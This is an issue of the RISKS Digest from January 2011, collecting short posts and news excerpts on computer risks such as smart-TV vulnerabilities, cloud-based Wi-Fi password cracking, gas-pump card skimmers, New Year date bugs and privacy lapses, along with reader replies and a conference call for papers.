The Risks Digest

The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 26 Issue 29

Thursday 13 January 2011

Contents

Jackpot: Bug or Feature?
Chuck Weinstock
Researchers Hack Internet Enabled TVs, Discover Multiple Security Vulnerabilities
Mike Lennon via Monty Solomon
Caveman: Using the cloud to break passwords
Dan Goodin
Infected PC Compromises Pentagon Credit Union
slashdot via Robert Schaefer
3 Tucson UMC workers fired for records access
Stephanie Innes via Monty Solomon
Bug Causes iPhone Alarm to Greet New Year With Silence
Nick Bilton via Monty Solomon
Wristwatch fails 2010->2011 transition
Bill Stewart
Security risks in PDF documents
Lauren Weinstein
New twist on ATM skimming: put the data collector inside the gas pump!
Paul Saffo
Risks of Touring the White House
Daniel Faigin
Confusing Interface
Gene Wirchenko
Re: "Risk of coffee in the cockpit", maybe, maybe not
Danny Burstein
Re: RISKS of reusing ID numbers
Jonathan Kamens
50th Anniversary of Eisenhower's Farewell Address
PGN
Call for Papers: RAID'11
Guofei Gu
Info on RISKS (comp.risks)

Jackpot: Bug or Feature?

Chuck Weinstock <weinstock@sei.cmu.edu>
Tue, 4 Jan 2011 09:54:49 -0500

http://www.post-gazette.com/pg/11004/1115414-58.stm

A man in Pittsburgh was arrested on a federal warrant accusing him of
stealing as much as $1.4 million from US casinos. He was about to stand
trial for bilking a local casino out of nearly a half-million dollars in
fraudulent jackpots.

The jackpots resulted from a flaw in the software of certain IGT
machines. These machines apparently awarded a jackpot when a special
sequence of buttons was pushed.

I wonder if a good defense here is that the machine was doing exactly what
it was programmed to do and all the defendant was doing was using expert
play to increase his chances of winning.


Researchers Hack Internet Enabled TVs, Discover Multiple Security

Monty Solomon <monty@roscom.com>
Sun, 9 Jan 2011 12:05:04 -0500
  Vulnerabilities (Mike Lennon)

Mike Lennon, Researchers Hack Internet Enabled TVs, Discover Multiple Security
Vulnerabilities, *SecurityWeek*, 3 Jan 2011

Internet TVs - The Latest Attack Vector: Researchers Hack Internet
Enabled TVs, Discover Multiple Security Vulnerabilities

Was your home lucky enough to get a new Internet enabled TV over the
holidays? If so, you're probably quite excited and enjoying the features of
your new digital media hub while you sit back and sip on some eggnog or hot
chocolate from your couch - which you should. But you may also want to be
careful, as Internet TVs could be the newest avenue for cybercriminals to
infiltrate your home or business. (I know, more FUD from a security vendor,
but this is actually interesting stuff and they were able to show us how it
was done)

Security researchers have discovered several security flaws in one of the
best-selling brands of Internet-connected HDTVs, and believe it's likely
that similar security flaws exist in other Internet TVs.

During the course of its research, Mocana, the security firm that discovered
the flaws, demonstrated that the TV's Internet interface failed to confirm
script integrity before scripts were run. As a result, an attacker could
intercept transmissions from the television to the network using common
"rogue DNS", "rogue DHCP server", or TCP session hijacking
techniques. Mocana was able to demonstrate that JavaScript could then be
injected into the normal datastream, allowing attackers to obtain total
control over the device's Internet functionality. This attack could render
the product unusable at important times and extend or limit its
functionality without the manufacturer's permission. More importantly,
however, this same mechanism could be used to extract sensitive credentials
from the TV's memory, or prompt the user to fill out fake online forms to
capture credit card information. (Mocana did issue a technical report on the
details of the security vulnerabilities which is available here - short
registration required)

Additionally, researchers were able to recover the manufacturer's private
"third-party developer keys" from the television, because in many cases,
these keys were transmitted unencrypted and "in the clear." Many third-party
search, music, video and photo-sharing services delivered over the Internet
require such keys, and a big TV manufacturer often purchases high-volume
"special" access privileges to these service provider's networks. A hacker
could potentially employ these keys, for example, to access these
high-volume services at no charge (or at least, on the TV manufacturer's
bill). ...

http://www.securityweek.com/researchers-hack-internet-enabled-tvs-discover-multiple-security-vulnerabilities


Caveman: Using the cloud to break passwords

"Peter G. Neumann" <neumann@csl.sri.com>
Wed, 12 Jan 2011 1:58:26 PST

  [Thanks to Jeremy Epstein and Matthew Kruk.]

Dan Goodin in San Francisco, Researcher cracks Wi-Fi passwords
with Amazon cloud: Return of the Caveman attack, *The Register*, 11 Jan 2011
http://www.theregister.co.uk/2011/01/11/amazon_cloud_wifi_cracking/

A security researcher has tapped Amazon's cloud computing service to crack
Wi-Fi passwords in a fraction of the time and for a fraction of the cost of
using his own gear.  Thomas Roth of Cologne, Germany told Reuters [1] he
used custom software running on Amazon's Elastic Compute Cloud service to
break into a WPA-PSK protected network in about 20 minutes. With refinements
to his program, he said he could shave the time to about six minutes. With
EC2 computers available for 28 cents per minute, the cost of the crack came
to just $1.68.  "People tell me there is no possible way to break WPA, or,
if it were possible, it would cost you a ton of money to do so," Roth told
the news service. "But it is easy to brute force them."

Roth is the same researcher who in November used Amazon's cloud to brute
force SHA-1 hashes [2]. Roth said he cracked 14 hashes from a 160-bit SHA-1
hash with a password of between one and six characters in about 49
minutes. He told The Register at the time he'd be able to significantly
reduce that time with minor tweaks to his software, which made use of
"Cluster GPU Instances" of the EC2 service [3].

As the term suggests, brute force cracks are among the least sophisticated
means of gaining unauthorized access to a network. Rather than exploit
weaknesses, they try huge numbers of possible passwords until the right
phrase is entered. Roth has combined this caveman approach with a highly
innovative technique that applies it to extremely powerful servers that
anyone can rent at highly affordable rates.

Roth's latest program uses EC2 to run through 400,000 possible passwords per
second, a massive amount that only a few years ago would have required the
resources of a supercomputer. He is scheduled to present his findings [4] at
next week's Black Hat security conference in Washington, DC.

   1. http://uk.reuters.com/article/idUKTRE70641M20110107
   2. http://www.theregister.co.uk/2010/11/18/amazon_cloud_sha_password_hack/
   3. https://aws.amazon.com/ec2/
   4. http://www.blackhat.com/html/bh-dc-11/bh-dc-11-briefings.html#Roth


Infected PC Compromises Pentagon Credit Union

Robert Schaefer <rps@haystack.mit.edu>
Thu, 13 Jan 2011 08:21:30 -0500

"The credit union used by members of the U.S. armed forces and their
families has admitted that a laptop infected with malware was used to access
a database containing the personal and financial information of customers.
The Pentagon Federal Credit Union (PenFed) issued a statement to the New
Hampshire Attorney General that said data, including the names, addresses,
Social Security Numbers and PenFed banking and credit card account
information of its members were accessed by the infected PC."

slashdot, 12 Jan 2011
https://threatpost.com/en_us/blogs/infected-pc-compromises-pentagon-credit-union-011211

robert schaefer, Atmospheric Sciences Group, MIT Haystack Observatory
Westford, MA 01886 1-781-981-5767 http://www.haystack.mit.edu


3 Tucson UMC workers fired for records access (Stephanie Innes)

Monty Solomon <monty@roscom.com>
Thu, 13 Jan 2011 10:31:04 -0500

Stephanie Innes, *Arizona Daily Star*, 12 Jan 2011

Three employees at Tucson's University Medical Center have been fired for
violating patient privacy in connection with accessing confidential medical
records in the high-profile shooting rampage that killed six people and left
Congresswoman Gabrielle Giffords in critical condition, hospital officials
said.  All the remaining injured patients from the shootings, including
Giffords, are at UMC.  ...

http://azstarnet.com/news/local/crime/article_4f789a48-1e8c-11e0-929a-001cc4c002e0.html


Bug Causes iPhone Alarm to Greet New Year With Silence

Monty Solomon <monty@roscom.com>
Mon, 3 Jan 2011 19:20:51 -0500

Nick Bilton, Bug Causes iPhone Alarm to Greet New Year With Silence,
*The New York Times*, 2 Jan 2011

Pat Kiernan, a morning anchor on NY1, the New York City cable news channel,
is no stranger to alarm clock problems. That's why he usually relies on
several clocks, phones and other devices to wake him in time for his early
newscasts.

That redundancy paid off for Mr. Kiernan on Saturday when his primary alarm,
the one built into his Apple iPhone, failed to go off because of a
programming error in the phone's calendar software.

"Before I went to bed I set two iPhone alarms, and both completely failed to
go off," said Mr. Kiernan, adding that he uses the iPhone as his alarm clock
when he travels. "Luckily I had an Android phone with me as a third backup
alarm, and it woke me up in time for my news segment."

Many people weren't as lucky as Mr. Kiernan, voicing frustration online
after they overslept on the first morning of the new year.

By Sunday morning thousands more people were posting angry missives about
the iPhone problem on Twitter, Facebook and other social networks, noting
that they had missed a breakfast meeting or were running late for work or
church. ...

http://www.nytimes.com/2011/01/03/technology/03iphone.html


Wristwatch fails 2010->2011 transition

Bill Stewart <bill.stewart@pobox.com>
Sat, 01 Jan 2011 01:59:51 -0800

At last night's New Years Eve party, we were already disturbed to find
significant time skew between people who had cell phones and wristwatches
that are automatically set from WWV.  (Most of the phones either had the
same time or didn't show seconds.)

And then at midnight, somebody's new digital wristwatch failed :-) We're not
really sure what happened, and it fixed itself about 10 minutes later, but
the owner said it spent a while going back and forth between 00:12 and 00:13
or something equally strange.  This being a techie crowd, it led to the
usual stories about Y2K and programs on punched cards that needed to be
rewritten for the one-digit-date rollover from 1979->1980 and such, but
after Y2K you'd think people would just Know Better.


Security risks in PDF documents

Lauren Weinstein <lauren@vortex.com>
Sun, 2 Jan 2011 08:48:11 -0800

  [From Network Neutrality Squad]
http://bit.ly/gUuFCU  (The H Security)

Depending on implementation details, this may be an argument for viewing PDF
documents in inherently more "sandboxed" environments like Google Chrome
(which has a basic internal PDF viewer) rather than using full-blown Adobe
readers (when possible and practical, given current feature requirements in
any given case).


New twist on ATM skimming: put the data collector inside the gas pump!

Paul Saffo <psaffo@mac.com>
Wed, 12 Jan 2011 07:23:50 -0800

Two Men Plea Guilty in Sophisticated Gas Station ATM and Credit Card
Skimming Scheme, 11 Jan 2011, Contact: (510) 622-4500
http://oag.ca.gov/news/press_release?id=2024

Martinez CA, Two men were sentenced today to prison for their role in
stealing more than $90,000 from some 200 people in Northern California by
stealing personal financial information with a sophisticated skimming device
placed inside ATM and credit card payment devices at gas station pumps.

This morning in Contra Costa County Superior Court in Martinez, the two men
pleaded guilty to all felonies they were charged with, including conspiracy
and identity theft. David Karapetyan, 32, pled guilty to 37 felonies and
received a seven-year prison sentence. Zhirayr Zamanyan, 31, pled guilty to
five felonies and received a five-year prison sentence. Two other
defendants, Edwin Hamazaspyan, 31, and Naum Mints, 21, are scheduled to
appear in court on February 15.

In March, the Attorney General's office took over prosecution of the case
from the Contra Costa District Attorney's office because the crimes occurred
in multiple jurisdictions throughout Northern California. An amended
complaint was filed in October.

In their high-tech crime spree, the gang traveled to gas stations across the
Bay Area in a rented Cadillac Escalade. From November 2009 to February 2010,
they are believed to have stolen $90,000 from 196 people through their
skimming scheme.

The thieves acquired keys to unlock various kinds of gas station pumps. Once
they opened the pumps, they were able to connect two cables inside to their
two-inch electronic device, which looked like a circuit board encased in
electrical tape, and recorded ATM and credit card data as well as victims'
PINs. No tampering was visible on the outside of the pumps. The gang would
later return to retrieve the skimmers, which took less than 20 seconds.

The investigation began in February when police in Solano and Contra Costa
counties reported an increase in identity theft and a 7-Eleven store
employee in Martinez noticed a skimming device inside a gas pump. Police
removed the device, replaced it with a mock device and conducted 24-hour
surveillance. Karapetyan and Zamanyan were arrested when they arrived to
remove the device. In total, seven devices were found inside gas pumps in
Martinez, Benicia, Livermore, Hayward, Oakland, San Mateo and Sacramento.

Banks have reimbursed the victims.

The Northern California Computer Crimes Task Force, a partnership of 17
local, state and federal agencies, participated in the investigation with
assistance from the U.S. Secret Service, Martinez Police Department and the
Glendale Police Department.

The amended complaint and second amended complaint, as well as the arrest
affidavit for Mints, are attached to the electronic version of the press
release on the Attorney General's website: www.ag.ca.gov


Risks of Touring the White House

Daniel Faigin <faigin@cahighways.org>
Tue, 4 Jan 2011 12:04:40 -0800

My daughter is getting ready for a Confirmation Class trip to Washington DC,
which will include a trip to the White House. So I received an email request
from the trip coordinator stating: "There is a security form that I must
fill out and I need the following information for each student/participant
ASAP! 1. Name as it appears on Drivers License or other legal document;
2. Social Security Number; 3. Exact Date of Birth; 4. Citizen of US? Yes or
No?; 5. City of current residence." She needed it ASAP, and I'm betting most
parents will blindly email her the SSN. I've already informed her of the
problem with doing that, but this is just the tip of the iceberg.

I wanted to see why the SSN was required, and so I did some searching.  I
found Rep Elton Gallegly's site on tours
(https://forms.house.gov/gallegly/forms/tours/tour_request.shtml), and it
calls for the same information. So this seems to be a White House
requirement (and SSNs seem to be a common identifier for searching security
records, even though that isn't their real use). However, what is scary is
the following: " Download Security Information Sheet (Excel) and email to
CA24.Tours@mail.house.gov". Yup. Email again. You would think in this era of
the Privacy Act the White House webmaster would have set up an HTTPS: page
to submit this information.

Daniel Faigin, CISSP
faigin -at cahighways -dot org
Journal/Blog: cahwyguy.livejournal.com Facebook: facebook.com/cahwyguy


Confusing Interface

Gene Wirchenko <genew@ocis.net>
Mon, 10 Jan 2011 13:44:23 -0800

I just got an Epson Stylus NX215 printer.  I hope it lasts longer than my
Dell laser printer which did not get through its second toner cartridge
although my usage was not heavy in the 3 1/2 years that I used it.

My new printer has very nice documentation for the installation, but one
little bit got me.  Near the end, there is the option to install some
additional goodies.  The interface was less than clear.

"Select the items you want and click Install".  OK.  What do the Xs mean?
Do they mean that the items have been selected, or that no, they have not
been?  The form starts with an X in each choice.

It turns out that X means selected, but it could easily mean the other way
around since X can mean wrong or no.

Windows has standard input controls, but it seems that it is not the thing
to do to use them when writing your installation program.  I have run into
the attitude before.  In one USENET posting, a newbie was asking about other
controls.  He did not want to use the standard ones, BECAUSE they were
standard.

I remember one of the benefits of Windows pushed in the early days that with
standard interfaces, it would be easier.  My bet was that, since graphics
was getting to be very important, the standard controls would be considered
not good enough.  I wish I had bet money on this.  This is not the first
time that I have been puzzled by non-standard controls.


Re: "Risk of coffee in the cockpit", maybe, maybe not

Danny Burstein <dannyb@panix.com>
Wed, 12 Jan 2011 20:29:31 -0500 (EST)
  (Brown, RISKS-26.28)

The aviation folk are having lots of fun digesting this story and trying to
determine whether or not the claimed scenario is, indeed, plausible.

Curiously enough the film "Fate is the Hunter" [a] aired, err, cabled... on
the Turner Classic Movies cable channel a week or so ago. The plot revolves
around an airplane crash which seems to be due to pilot error.

One investigator just can't believe "his pilot" would do something that
careless.

The relevance here (rot-13'ed as it's a spoiler):

Vg gheaf bhg gung n fcvyyrq phc bs pbssrr fubegrq
bhg gur pbageby pvephvgel, xabpxvat bhg gur ratvarf.

So it may be that we have real life following a movie
script. Or possibly just the reporting of same...

[a] http://en.wikipedia.org/wiki/Fate_Is_the_Hunter_%28film%29
     http://www.imdb.com/title/tt0058091/
   [Also noted by Charlie Shub. citing the author of the 1961 movie
   Ernest K. Gann, and the Glenn Ford movie (1964).  PGN]


Re: RISKS of reusing ID numbers (RISKS 26.27)

Jonathan Kamens <jik@kamens.us>
Wed, 12 Jan 2011 09:28:16 -0500

  [I somehow missed Geoff Kuenning's response to Jonathan before putting out
  RISKS-26.28.  But I thought Jonathan's posting stood on its own.  This
  time, Geoff's reply to Jonathan follows below.  PGN]

Geoff, It seems to me that Apple is not *complicit* in this case. Rather,
Apple is *the cause* of the problem you encountered.

If TNT's tracking numbers end with two letters, and Apple doesn't include
the two letters when giving out TNT tracking numbers, then the confusion was
introduced by Apple, not by TNT.

I have no direct knowledge of how TNT generates tracking numbers, but with
those two letters at the end, I can easily envision a tracking number
algorithm which would completely eliminate the potential for confusion. For
example, if the two letters indicate in base 26 the number of days since
some baseline date modulus 676 (26*26), which gives you a range of 1.85
years, then as long as (a) TNT removes old shipping records from their Web
tracking in less than 1.85 years, and (b) their system ensures that the same
tracking number is not used twice /in the same day/, tracking number
confusion will never occur.

I think a correction to RISKS is in order.

On 01/12/2011 07:57 AM, Geoff Kuenning wrote:
>> Their Web site says, "If your consignment number appears more than once
>> in the results field, you can use the letters as shown on your
>> consignment note, e.g. GE123456781WW, to avoid duplicate results." Were
>> you given those letters? Did using them eliminate the duplication?

> Interesting; I missed seeing that note.  No, I wasn't given those letters.
> I cut and pasted directly from Apple's e-mail.  So apparently Apple is
> complicit in this case.  (*Why* would they go out of their way to remove
> information?  It can't be easy to correctly reduce the ID number from
> multiple shipping suppliers to a minimal acceptable value.  Weird.)


50th Anniversary of Eisenhower's Farewell Address

"Peter G. Neumann" <neumann@csl.sri.com>
Thu, 13 Jan 2011 11:20:22 PST

CSPO and AAAS are co-sponsoring a seminar in Washington, D.C., commemorating
the 50th anniversary of President Dwight D. Eisenhower's farewell address.
Eisenhower's speech is mainly remembered for his warning of the perils of a
"military-industrial complex."  Less widely known, but no less important,
was his caution a few sentences later about "the danger that public policy
could itself become the captive of a scientific-technological elite."  This
seminar will explore the historical context and current relevance of
Eisenhower's worries.

Was He Right About the "Scientific-Technological Elite?"
AAAS Auditorium / Washington, D.C.

Panel:

* Dan Greenberg, science journalist and author of several books on science
  policy

* Gregg Pascal Zachary, author of the authoritative biography of Vannevar
  Bush

* William Lanouette, a journalist on science policy and a senior analyst on
  energy and science issues at GAO from 1991 to 2006

* Dan Sarewitz, co-director of CSPO

* Moderator:  Steve Lagerfeld, editor of The Wilson Quarterly

Live webcast Jan. 18 at 4:30p ET / 2:30p MT
GO TO: http://www.ustream.tv/channel/cspo


Call for Papers: RAID'11

"Guofei Gu" <guofei@cse.tamu.edu>
Thu, 13 Jan 2011 16:01:04 -0600

                   CALL FOR PAPERS: RAID 2011
  14th International Symposium on Recent Advances in Intrusion Detection
                      September 20-21, 2011
                 SRI International, Menlo Park, CA
                       http://raid2011.org
          Paper submission deadline: Mar 31, 2011 (11:59PM PST)
        [Excerpted for RISKS.  See raid2011.org for details.  PGN]

This symposium, the 14th in an annual series, brings together leading
researchers and practitioners from academia, government, and industry to
discuss issues and technologies related to intrusion detection and
defense. The Recent Advances in Intrusion Detection (RAID) International
Symposium series furthers advances in intrusion defense by promoting the
exchange of ideas in a broad range of topics. As in previous years, all
topics related to intrusion detection, prevention and defense systems and
technologies are within scope, including but not limited to the following:

    * Network and host intrusion detection and prevention
    * Anomaly and specification-based approaches
    * IDS cooperation and event correlation
    * Malware prevention, detection, analysis, containment
    * Web application security
    * Insider attack detection
    * Intrusion response, tolerance, and self-protection
    * Operational experiences with current approaches
    * Intrusion detection assessment and benchmarking
    * Attacks against intrusion detection systems
    * Formal models, analysis, and standards
    * Deception systems and honeypots
    * Vulnerability analysis and forensics
    * Adversarial machine learning for security
    * Visualization techniques
    * High-performance intrusion detection
    * Legal, social, and privacy issues
    * Network exfiltration detection
    * Botnet analysis, detection, and mitigation
    * Cyber-physical systems

    General Chair:     Alfonso Valdes, SRI International, US
    Program Chair:     Robin Sommer, ICSI/LBNL, US
    Program Co-Chair:  Davide Balzarotti, Eurecom, France
    Publication Chair: Gregor Maier, ICSI, US
    Publicity Chair:   Guofei Gu, Texas A&M, US

Guofei Gu, Assistant Professor, Department of Computer Science & Engineering
Texas A&M University

Please report problems with the web pages to the maintainer

Top